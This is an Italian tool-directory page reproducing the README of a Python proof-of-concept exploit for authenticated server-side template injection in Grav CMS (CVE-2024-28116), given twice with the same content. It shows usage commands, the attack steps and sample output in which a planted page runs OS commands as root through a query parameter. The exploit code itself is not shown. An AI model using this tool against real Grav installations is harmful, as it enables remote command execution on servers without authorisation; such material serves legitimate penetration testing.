Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
GenGravSSTIExploit — è uno script Python PoC che sfrutta una vulnerabilità di Server-Side Template Injection (SSTI) che richiede autenticazione in Grav CMS versioni <= 1.7.44 (CVE-2024-28116) | Kitploit
Strumenti/GitHubGitHub/geniuszly/gengravsstiexploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

è uno script Python PoC che sfrutta una vulnerabilità di Server-Side Template Injection (SSTI) che richiede autenticazione in Grav CMS versioni <= 1.7.44 (CVE-2024-28116)

Vedi Repository
72371 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

EN

GenGravSSTIExploit è uno script PoC in Python che sfrutta una vulnerabilità di Server-Side Template Injection (SSTI) autenticata nelle versioni di Grav CMS <= 1.7.44 (CVE-2024-28116). Questa vulnerabilità consente a un utente con permessi di editor di eseguire comandi del sistema operativo su un server remoto.

Nota: questo script richiede credenziali valide per autenticarsi nella console di Grav CMS.

Funzionalità

  • Si autentica nel pannello di amministrazione di Grav CMS utilizzando le credenziali dell'editor.
  • Crea una nuova pagina nel CMS per iniettare un payload.
  • Esegue comandi del sistema operativo da remoto sfruttando la vulnerabilità SSTI.

Requisiti

  • Python 3.x
  • Libreria requests (installabile con pip install requests)

Utilizzo

  1. Clona il repository

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
Configura le credenziali

Modifica lo script per inserire le tue credenziali di editor di Grav CMS:

root@kitploit:~
GRAV_USER = "youruser"
GRAV_PASSWORD = "yourpassword"
  • Esegui lo script

    Usa il seguente comando per eseguire lo script:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: URL target nel formato http[s]://hostname.
    • <PORT>: numero di porta (predefinito: 80).

    Esempio:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  • Interagisci con l'exploit

    Se l'exploit ha successo, riceverai un URL su cui potrai eseguire comandi del sistema operativo:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    
  • Esempio di output

    root@kitploit:~
      python GenGravSSTIExploit.py -t http://example.com -p 8080
    

    Lo script eseguirà ogni passaggio, fornendoti aggiornamenti tramite il terminale. Ecco cosa potresti vedere:

    root@kitploit:~
    2024-10-02 12:00:01 - INFO - Проверка целевого URL...
    2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
    2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
    2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
    2024-10-02 12:00:05 - INFO - Создание новой страницы...
    2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
    2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
    2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
    

    Al termine dello script, vedrai un messaggio con il link alla pagina iniettata. Puoi visitare questo link per eseguire comandi del sistema operativo

    root@kitploit:~
    http://example.com:8080/poc_4T7B?do=whoami
    

    Visitando l'URL con il comando specificato, l'output verrà mostrato direttamente sulla pagina:

    root@kitploit:~
    Cmd-Output:
    root
    

    Dichiarazione di non responsabilità

    Questo strumento è destinato esclusivamente a scopi educativi. Usalo in modo responsabile e solo su sistemi per cui hai esplicita autorizzazione. L'autore non è responsabile per eventuali usi impropri o danni causati da questo script.

    RU

    GenGravSSTIExploit è uno script PoC in Python che sfrutta una vulnerabilità SSTI (Server-Side Template Injection) autenticata nelle versioni di Grav CMS <= 1.7.44 (CVE-2024-28116). Questa vulnerabilità consente a un utente con permessi di editor di eseguire comandi del sistema operativo su un server remoto.

    Nota: lo script richiede credenziali valide per l'autenticazione nel pannello di amministrazione di Grav CMS.

    Caratteristiche

    • Autenticazione nel pannello di amministrazione di Grav CMS tramite credenziali di editor.
    • Creazione di una nuova pagina nel CMS per l'iniezione del payload.
    • Esecuzione remota di comandi del sistema operativo sfruttando la vulnerabilità SSTI.

    Requisiti

    • Python 3.x
    • Libreria requests (installabile con pip install requests)

    Utilizzo

    1. Clona il repository

      root@kitploit:~
      git clone https://github.com/geniuszly/GenGravSSTIExploit
      cd GenGravSSTIExploit
      
    2. Configura le credenziali

      Modifica lo script e inserisci le credenziali di editor di Grav CMS:

      root@kitploit:~
      GRAV_USER = "youruser"
      GRAV_PASSWORD = "yourpassword"
      
    3. Esegui lo script

      Usa il seguente comando per eseguire lo script:

      root@kitploit:~
      python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
      
      • <TARGET_URL>: URL target nel formato http[s]://hostname.
      • <PORT>: numero di porta (predefinito: 80).

      Esempio:

      root@kitploit:~
      python GenGravSSTIExploit.py -t http://example.com -p 8080
      
    4. Interagisci con l'exploit

      Se l'exploit ha successo, riceverai un URL dove potrai eseguire comandi del sistema operativo:

      root@kitploit:~
      [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_<ID>?do=<command>
      

    Esempio di output

    root@kitploit:~
      python GenGravSSTIExploit.py -t http://example.com -p 8080
    

    Lo script eseguirà ogni passaggio, fornendoti aggiornamenti tramite il terminale. Ecco cosa potresti vedere:

    root@kitploit:~
    2024-10-02 12:00:01 - INFO - Проверка целевого URL...
    2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
    2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
    2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
    2024-10-02 12:00:05 - INFO - Создание новой страницы...
    2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
    2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
    2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>
    

    Al termine dell'esecuzione dello script, vedrai un messaggio con il link alla pagina iniettata. Puoi visitare questo link per eseguire i comandi:

    root@kitploit:~
    http://example.com:8080/poc_4T7B?do=whoami
    

    Visitando l'URL con il comando specificato, l'output verrà visualizzato direttamente sulla pagina:

    root@kitploit:~
    Cmd-Output:
    root
    

    Dichiarazione di non responsabilità

    Questo strumento è destinato esclusivamente a scopi educativi. Usalo in modo responsabile e solo su sistemi per cui hai un'autorizzazione esplicita. L'autore non è responsabile per eventuali abusi o danni causati da questo script.

    Scarica lo strumento